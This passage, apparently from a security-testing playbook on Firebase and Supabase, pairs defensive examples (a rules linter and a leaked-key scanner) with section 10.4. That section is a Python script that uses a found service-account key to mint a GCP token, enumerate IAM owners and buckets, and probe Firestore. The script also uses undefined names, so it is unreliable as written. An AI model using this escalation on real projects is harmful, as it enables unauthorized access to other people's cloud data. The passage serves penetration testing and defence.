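&lt;p&gt;Every one of these findings, like the &amp;ldquo;if rules allow&amp;rdquo; conditions listed under 10.1, comes down to the project&amp;rsquo;s security rules. The linter below is an added example, not the playbook&amp;rsquo;s code: it walks a Firestore or Storage rules file, tracks the enclosing &lt;code&gt;match&lt;/code&gt; paths, and classifies every &lt;code&gt;allow&lt;/code&gt; statement. An unconditional allow or &lt;code&gt;if true&lt;/code&gt; is open to anyone holding the web API key; a bare &lt;code&gt;request.auth != null&lt;/code&gt; is open to any account, which with open signUp (10.2) amounts to the same thing; a condition tied to &lt;code&gt;request.auth.uid&lt;/code&gt; passes. The two rules files are constructed samples.&lt;/p&gt;

```python
import operator
import re

# One "allow" statement: the operations, and an optional "if" condition.
ALLOW_RE = re.compile(r"allow\s+([a-z,\s]+?)\s*(?::\s*if\s+(.+?))?\s*;")
# A "match" block opener; the path may itself contain {wildcards}.
MATCH_RE = re.compile(r"match\s+(\S+)\s*\{")


def classify_condition(condition):
    """Map an allow condition to a severity, or None when it looks properly scoped."""
    compact = re.sub(r"\s+", "", condition)
    if compact == "" or compact == "true":
        return "CRITICAL"      # anyone holding the web API key, no account needed
    if compact == "false":
        return None            # explicitly locked
    if compact == "request.auth!=null":
        return "HIGH"          # any account; equals public when signUp is open
    if "request.auth.uid" in compact:
        return None            # tied to the caller's identity
    return "REVIEW"            # custom logic: read it by hand


def lint_rules(rules_text):
    """Walk a rules file; return (severity, path, ops, condition) for each weak allow."""
    findings = []
    path_stack = []   # (path segment, brace depth at which its block opened)
    depth = 0
    for raw in rules_text.splitlines():
        line = raw.split("//", 1)[0].strip()   # drop line comments
        if not line:
            continue
        m = MATCH_RE.search(line)
        if m:
            path_stack.append((m.group(1), depth + 1))
        a = ALLOW_RE.search(line)
        if a:
            ops = a.group(1).replace(" ", "")
            condition = (a.group(2) or "").strip()
            path = "".join(segment for segment, _ in path_stack)
            severity = classify_condition(condition)
            if severity is not None:
                findings.append((severity, path, ops, condition))
        depth = depth + line.count("{") - line.count("}")
        # leave every match block whose opening depth is deeper than the current depth
        while path_stack and operator.lt(depth, path_stack[-1][1]):
            path_stack.pop()
    return findings


# Constructed sample: the mix of rules behind the findings above.
SAMPLE_FIRESTORE_RULES = """
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // anyone with the web API key can dump or overwrite every store
    match /stores/{storeId} {
      allow read, write: if true;
    }
    // any signed-in account, including self-registered ones, reads every conversation
    match /conversations/{convId} {
      allow read: if request.auth != null;
      allow write: if false;
    }
    // properly scoped: a user touches only their own document
    match /users/{userId} {
      allow read, write: if request.auth.uid == userId;
    }
  }
}
"""

SAMPLE_STORAGE_RULES = """
rules_version = '2';
service firebase.storage {
  match /b/{bucket}/o {
    match /{allPaths=**} {
      allow read;
      allow write: if request.auth != null;
    }
  }
}
"""

if __name__ == "__main__":
    for finding in lint_rules(SAMPLE_FIRESTORE_RULES) + lint_rules(SAMPLE_STORAGE_RULES):
        print(finding)
```

&lt;p&gt;Run it in CI against &lt;code&gt;firestore.rules&lt;/code&gt; and &lt;code&gt;storage.rules&lt;/code&gt; before &lt;code&gt;firebase deploy&lt;/code&gt;; the &lt;code&gt;REVIEW&lt;/code&gt; bucket exists because a regex cannot judge custom conditions, only the two shapes that produce the dumps described above.&lt;/p&gt;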
&lt;h3 id="104-service-account-key--escalation-to-gcp" &gt;
&lt;div&gt;
&lt;a href="#104-service-account-key--escalation-to-gcp"&gt;
##
&lt;/a&gt;
10.4 Service Account Key — Escalation to GCP
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If you find an SA key (JSON with &lt;code&gt;private_key&lt;/code&gt; and &lt;code&gt;client_email&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes, serialization
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;get_gcp_token&lt;/span&gt;(sa_key):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Generates a GCP access token from an SA key.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; now &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps({&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;})&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; claims &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iss&amp;#34;&lt;/span&gt;: sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;scope&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;https://www.googleapis.com/auth/cloud-platform&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;aud&amp;#34;&lt;/span&gt;: sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: now,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: now &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; payload &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(claims)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;private_key&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; signature &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; resp &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&amp;amp;assertion=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;signature&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()[&lt;span style="color:#a6d189"&gt;&amp;#39;access_token&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# With the token, list IAM policy (find owners/admins)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://cloudresourcemanager.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:getIamPolicy&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; binding &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;bindings&amp;#39;&lt;/span&gt;, []):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; binding[&lt;span style="color:#a6d189"&gt;&amp;#39;role&amp;#39;&lt;/span&gt;] &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#39;roles/owner&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;roles/editor&amp;#39;&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;👑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;binding[&lt;span style="color:#a6d189"&gt;&amp;#39;role&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;binding[&lt;span style="color:#a6d189"&gt;&amp;#39;members&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List Storage buckets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://storage.googleapis.com/storage/v1/b?project=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; bucket &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;items&amp;#39;&lt;/span&gt;, []):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📦 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;bucket[&lt;span style="color:#a6d189"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test Firestore access&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 FIRESTORE ACCESSIBLE&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
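&lt;p&gt;Since a single leaked key file is the whole chain above, the matching defensive control is finding those files before anyone else does. The scanner below is an added example, not the playbook&amp;rsquo;s code: it locates service-account key JSON embedded in arbitrary text (a JS bundle, a committed config file, a ticket attachment), parses it with the standard-library JSON decoder, and returns a redacted fingerprint (&lt;code&gt;client_email&lt;/code&gt;, &lt;code&gt;project_id&lt;/code&gt;, &lt;code&gt;private_key_id&lt;/code&gt;) that is enough to revoke the key without ever copying the private key into a report. The bundle text and the PEM body inside it are constructed samples.&lt;/p&gt;

```python
import json
import operator
import re

# A service-account key file always carries this marker, whatever else surrounds it.
MARKER_RE = re.compile(r'"type"\s*:\s*"service_account"')
REQUIRED_FIELDS = ("type", "project_id", "private_key_id", "private_key", "client_email", "token_uri")
PEM_HEADER = "-----BEGIN PRIVATE KEY-----"
PEM_FOOTER = "-----END PRIVATE KEY-----"


def extract_object(text, marker_pos):
    """Decode the JSON object enclosing the marker at marker_pos, or None if none parses."""
    decoder = json.JSONDecoder()
    start = text.rfind("{", 0, marker_pos)
    while start != -1:
        try:
            obj, end = decoder.raw_decode(text, start)
            if isinstance(obj, dict) and operator.gt(end, marker_pos):
                return obj          # the decoded object spans past the marker, so it contains it
        except ValueError:
            pass                    # not valid JSON from this brace; try the previous one
        start = text.rfind("{", 0, start)
    return None


def fingerprint(obj):
    """Redacted summary of a key object; the private key itself is never copied out."""
    missing = [field for field in REQUIRED_FIELDS if field not in obj]
    pem = obj.get("private_key", "")
    pem_ok = pem.startswith(PEM_HEADER) and pem.rstrip().endswith(PEM_FOOTER)
    return {
        "client_email": obj.get("client_email"),
        "project_id": obj.get("project_id"),
        "private_key_id": obj.get("private_key_id"),
        "pem_looks_valid": pem_ok,
        "missing_fields": missing,
        "usable": pem_ok and not missing,   # complete enough to mint tokens with
    }


def scan_text(text):
    """Return one redacted fingerprint per service-account key object found in text."""
    hits = []
    for m in MARKER_RE.finditer(text):
        obj = extract_object(text, m.start())
        if obj is not None:
            hits.append(fingerprint(obj))
    return hits


# Constructed bundle fragment: app code with a key object pasted in by mistake, plus a decoy.
SAMPLE_BUNDLE = r"""
var cfg = {debug: false, region: "us-central1"};
const sa = {"type": "service_account", "project_id": "example-project", "private_key_id": "0123abcd4567ef89",
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC(constructed)\n-----END PRIVATE KEY-----\n",
  "client_email": "backend@example-project.iam.gserviceaccount.com", "client_id": "112233445566",
  "token_uri": "https://oauth2.googleapis.com/token"};
var meta = {"type": "service_account", "name": "placeholder"};
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_BUNDLE):
        print(hit)
```

&lt;p&gt;The fingerprint maps straight to remediation: &lt;code&gt;private_key_id&lt;/code&gt; is the key to delete in IAM, &lt;code&gt;client_email&lt;/code&gt; is the account whose roles to review, and the same regex-plus-decoder approach works on git history, CI logs and build artifacts.&lt;/p&gt;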
&lt;h2 id="11-supabase-exploitation" &gt;
&lt;div&gt;
&lt;a href="#11-supabase-exploitation"&gt;
#
&lt;/a&gt;
11. SUPABASE EXPLOITATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="111-what-it-is-and-how-to-find-it" &gt;
&lt;div&gt;
&lt;a href="#111-what-it-is-and-how-to-find-it"&gt;
##
&lt;/a&gt;
11.1 What It Is and How to Find It
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Supabase is an open-source BaaS (Backend as a Service) and an alternative to Firebase. It combines PostgreSQL with a REST API, Auth and Storage.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Indicators&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Headers: &lt;code&gt;sb-api-version&lt;/code&gt;, &lt;code&gt;x-sb-auth&lt;/code&gt;, &lt;code&gt;x-supabase&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;URL: &lt;code&gt;https://{project_id}.supabase.co&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;JS bundles: &lt;code&gt;supabaseUrl&lt;/code&gt;, &lt;code&gt;supabaseKey&lt;/code&gt;, &lt;code&gt;SUPABASE_ANON_KEY&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Domain: &lt;code&gt;*.supabase.co&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="112-anon-key--what-it-allows" &gt;
&lt;div&gt;
&lt;a href="#112-anon-key--what-it-allows"&gt;
##
&lt;/a&gt;
11.2 Anon Key — What It Allows
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The &amp;ldquo;anon key&amp;rdquo; is a JWT found in JS bundles. With it, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Read tables&lt;/strong&gt;: if Row Level Security (RLS) is not configured&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Write (INSERT/UPDATE/DELETE)&lt;/strong&gt;: if RLS does not protect the table&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SignUp&lt;/strong&gt;: if the email provider is enabled&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage&lt;/strong&gt;: read buckets with public policies&lt;/li&gt;
&lt;/ul&gt;
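&lt;p&gt;A quick way to tell what a key found in a bundle actually is, is to look inside it. The anon key and its server-side sibling, the service_role key, are HS256 JWTs signed with the project&amp;rsquo;s JWT secret: the &lt;code&gt;role&lt;/code&gt; claim is &lt;code&gt;anon&lt;/code&gt; for the publishable key and &lt;code&gt;service_role&lt;/code&gt; for the key that bypasses RLS entirely, and the &lt;code&gt;ref&lt;/code&gt; claim is the project id from the &lt;code&gt;*.supabase.co&lt;/code&gt; URL. The Python below is an added example, not the playbook&amp;rsquo;s or Supabase&amp;rsquo;s code: it decodes the claims without verifying, assigns a severity, and shows the signature check that only the holder of the JWT secret can perform. The project ref, the secret and both tokens are constructed samples minted offline.&lt;/p&gt;

```python
import base64
import hashlib
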